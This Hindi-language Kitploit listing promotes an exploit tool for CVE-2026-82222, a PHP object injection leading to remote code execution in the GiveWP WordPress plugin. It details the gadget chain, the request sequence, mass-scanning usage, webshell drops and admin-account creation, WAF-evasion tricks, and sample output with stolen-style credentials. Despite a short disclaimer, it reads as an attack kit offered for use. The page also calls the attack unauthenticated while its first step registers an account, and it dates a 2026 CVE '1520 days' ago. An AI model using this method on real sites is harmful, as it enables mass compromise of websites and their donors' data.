Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-82222 — GiveWP <= 4.16.7.1 बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन → RCE | Kitploit
उपकरण/GitHubGitHub/r0x19/cve-2026-82222
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubr0x19/cve-2026-82222

CVE-2026-82222

GiveWP <= 4.16.7.1 बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन → RCE

रिपॉजिटरी देखें
1520 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-82222 — GiveWP <= 4.16.7.1 बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन → RCE

लेखक: Rx019
CVSS: 10.0 (क्रिटिकल)
प्रकार: बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन → रिमोट कोड निष्पादन
प्लगइन: GiveWP (give) — डोनेशन प्लगइन और फंडरेज़िंग प्लेटफ़ॉर्म
प्रभावित: <= 4.16.7.1
पैच किया गया: 4.16.8


विवरण

GiveWP दाता के last_name को बिना सैनिटाइज़ेशन के PHP सत्र में संग्रहीत करता है। जब कोई दान give_last फ़ील्ड के बिना जमा किया जाता है, तो GiveWP डेटाबेस से कच्चे मान को सीधे सत्र में डिसीरियलाइज़ करता है। यह एक बिना प्रमाणीकृत हमलावर को दाता प्रोफ़ाइल एंडपॉइंट के माध्यम से last_name में एक PHP सीरियलाइज़्ड ऑब्जेक्ट इंजेक्ट करने की अनुमति देता है, फिर एक क्राफ्टेड दान जमा करके डिसीरियलाइज़ेशन ट्रिगर करता है — जिसके परिणामस्वरूप GiveWP की बंडल वेंडर लाइब्रेरीज़ में उपलब्ध पूर्व-निर्मित POP श्रृंखला के माध्यम से मनमाना कमांड निष्पादन होता है।


POP श्रृंखला

root@kitploit:~
TCPDF::__destruct()
  └─ Session::getBag()           ← $attributeName द्वारा नामित विधि को कॉल करता है
       └─ DonationFactory::__call()
            └─ system($command)   ← $command $attributeName से

प्रयुक्त वेंडर क्लासेस:

क्लासफ़ाइल
TCPDFvendor/tecnickcom/tcpdf/tcpdf.php
Give\Vendors\Symfony\...\Sessionvendor/symfony/http-foundation/Session/Session.php
Give\TestData\Factories\DonationFactorysrc/TestData/Factories/DonationFactory.php

एक्सप्लॉइट प्रवाह

root@kitploit:~
1. दाता के रूप में पंजीकरण करें         → प्रमाणित सत्र (wp-login कुकी)
2. POST /wp-admin/profile.php
   last_name = एम्बेडेड system() कमांड के साथ सीरियलाइज़्ड TCPDF श्रृंखला
3. POST /wp-admin/admin-ajax.php
   action=give_process_donation  (give_last फ़ील्ड छोड़ा गया)
   → GiveWP DB से last_name पढ़ता है, कच्चा ऑब्जेक्ट सत्र में लिखता है
4. GET /?p={form_id}
   → PHP सत्र टियरडाउन TCPDF::__destruct() को ट्रिगर करता है
   → POP श्रृंखला system(command) निष्पादित करती है
5. शेल / एडमिन निर्माण की पुष्टि करें

आवश्यकताएँ

root@kitploit:~
pip install requests rich

Python >= 3.9


फ़ाइलें

फ़ाइलविवरण
CVE-2026-82222.pyएकल-लक्ष्य PoC — विस्तृत चरण-दर-चरण आउटपुट
CVE-2026-82222-MASS.pyमास स्कैनर — थ्रेडेड बैच मोड

उपयोग

एकल लक्ष्य

root@kitploit:~
python CVE-2026-82222.py

इंटरैक्टिव प्रॉम्प्ट:

root@kitploit:~
  लक्ष्य URL: https://victim.com

या सीधे:

root@kitploit:~
python CVE-2026-82222.py https://victim.com

मास स्कैनर

root@kitploit:~
# फ़ाइल से बैच
python CVE-2026-82222-MASS.py -f targets.txt

# कस्टम थ्रेड संख्या
python CVE-2026-82222-MASS.py -f targets.txt -t 10

# इनलाइन एकाधिक लक्ष्य
python CVE-2026-82222-MASS.py https://site1.com https://site2.com

# इंटरैक्टिव मेनू
python CVE-2026-82222-MASS.py

बैच फ़ाइल प्रारूप:

root@kitploit:~
# # से शुरू होने वाली पंक्तियाँ अनदेखी की जाती हैं
https://target1.com
https://target2.com
target3.com          # प्रोटोकॉल स्वतः https:// के रूप में जोड़ा जाता है
http://target4.com

आउटपुट

एकल मोड

root@kitploit:~
╭─ CVE-2026-82222 | Rx019 ─────────────────────────────╮
│                                                        │
│  PWNED (shell + direct)  https://victim.com           │
│  संस्करण : 4.15.0                                     │
│  WAF     : Wordfence                                   │
│  शेल    : https://victim.com/wp-content/uploads/...  │
│  विधि    : shell + direct (कोई .php लेखन आवश्यक नहीं) │
│  एडमिन  : rxadm3f91:RxAdm!k2m9xp7 ([email protected]) │
│                                                        │
╰────────────────────────────────────────────────────────╯

बैच सारांश

root@kitploit:~
  असुरक्षित : 12   आंशिक : 3   पैच किया गया : 44   असुरक्षित नहीं : 21   त्रुटियाँ : 2   कुल : 82

परिणाम ~/Documents/CVE/CVE-2026-82222/ में सहेजे गए:

फ़ाइलसामग्री
CVE-2026-82222_YYYYMMDD_HHMMSS.txtएकल-रन परिणाम
CVE-2026-82222_batch_YYYYMMDD_HHMMSS.txtपूर्ण बैच परिणाम
success_results.txtजोड़े गए VULN/PARTIAL पंक्तियाँ

हमले के मार्ग

एक्सप्लॉइट क्रम में दो प्राथमिक मार्गों का प्रयास करता है:

मार्ग A — प्रत्यक्ष एडमिन (कोई शेल फ़ाइल नहीं लिखी गई)

  1. TCPDF श्रृंखला में wp_create_user() PHP कोड को base64 के रूप में इंजेक्ट करें
  2. श्रृंखला को ट्रिगर करें — GiveWP कोड को सर्वर-साइड निष्पादित करता है
  3. बनाए गए एडमिन के रूप में लॉगिन करके सत्यापित करें
  4. WordPress प्लगइन/थीम फ़ाइल संपादक के माध्यम से शेल ड्रॉप करें

मार्ग B — GiveWP श्रृंखला शेल ड्रॉप

तब उपयोग किया जाता है जब मार्ग A विफल हो जाता है या एडमिन लॉगिन सत्यापित नहीं किया जा सकता।

  1. एक नया दाता सत्र पंजीकृत करें (नई PHP सत्र फ़ाइल — मार्ग A के वर्कर से लॉक प्रतिस्पर्धा से बचता है)
  2. प्रोफ़ाइल एंडपॉइंट के माध्यम से last_name में शेल-ड्रॉप कमांड इंजेक्ट करें
  3. सत्र दूषित करें (give_last के बिना दान करें)
  4. डिसीरियलाइज़ेशन ट्रिगर करें (/?p={form_id})
  5. अपलोड/प्लगइन/थीम निर्देशिकाओं में शेल उपस्थिति की पुष्टि करें
  6. फ़ॉलबैक: अपलोड में .txt फ़ाइल के लिए id | tee बीकन

मार्ग C — शेल के माध्यम से एडमिन

यदि शेल की पुष्टि हो जाती है लेकिन अभी तक कोई एडमिन मौजूद नहीं है, तो वेबशेल के ?c= पैरामीटर के माध्यम से wp_create_user() का उपयोग करके शेल के माध्यम से एक बनाएं।


WAF हैंडलिंग

WAFरणनीति
Imunify360X-Forwarded-For / X-Real-IP स्पूफ़ हेडर हटाएं
Wordfenceपूल से User-Agent घुमाएं
CloudflareAccept-Encoding: gzip, deflate, br सेट करें

नोट्स

  • एक्सप्लॉइट के लिए GiveWP में कम से कम एक प्रकाशित दान फ़ॉर्म होना आवश्यक है
  • लक्ष्य साइट पर पंजीकरण सक्षम होना चाहिए (WordPress कोर सेटिंग)
  • PHP-FPM वर्कर पूल ड्रेन: प्रत्यक्ष एडमिन श्रृंखला के बाद 30-सेकंड की नींद डाली जाती है ताकि सत्र-धारण करने वाला वर्कर बाद के अनुरोधों से पहले रिलीज़ हो सके
  • wp-config.php में DISALLOW_FILE_EDIT प्लगइन/थीम संपादक वेक्टर को ब्लॉक करता है — स्क्रिप्ट इसे जल्दी पहचानती है और मार्ग B पर गिर जाती है
  • शेल फ़ाइलनाम: Rx{100-999}.php — प्रति रन यादृच्छिक

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए जारी किया गया है।
केवल उन प्रणालियों के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
अनधिकृत उपयोग अवैध और अनैतिक है।

टूल डाउनलोड करें